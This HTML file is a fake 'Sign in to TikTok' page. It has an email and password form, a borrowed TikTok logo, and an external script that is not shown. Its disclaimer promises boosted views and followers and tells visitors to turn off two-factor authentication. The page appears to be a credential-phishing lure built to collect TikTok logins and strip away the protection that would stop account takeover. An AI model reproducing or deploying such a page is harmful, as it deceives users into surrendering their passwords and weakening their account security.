<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>TikTok Sign In</title>
  <link rel="stylesheet" href="/static/styles.css">
</head>
<body>
  <div class="container">
    <div class="logo">
      <img src="https://th.bing.com/th/id/R.b1b89b092fa7d3bd90956160b68c24d1?rik=KnpQBG9atts%2fHQ&pid=ImgRaw&r=0" alt="TikTok Bumber">
    </div>
    <h2>Sign in to TikTok</h2>
    <form id="loginForm">
      <input type="email" id="email" placeholder="Email or username" required>
      <input type="password" id="password" placeholder="Password" required>
      <button type="submit">Sign In</button>
    </form>
    <p class="forgot-password"><a href="#">Forgot password?</a></p>
    <p class="signup">Don't have an account? <a href="#">Sign up</a></p>
    <p class="disclaimer">This is a site to bump your tiktok views and followers. Make sure you dont have 2fa on since our api is limited and small hosted!</p>
  </div>
  <script src="/app.js"></script>
</body>
</html>
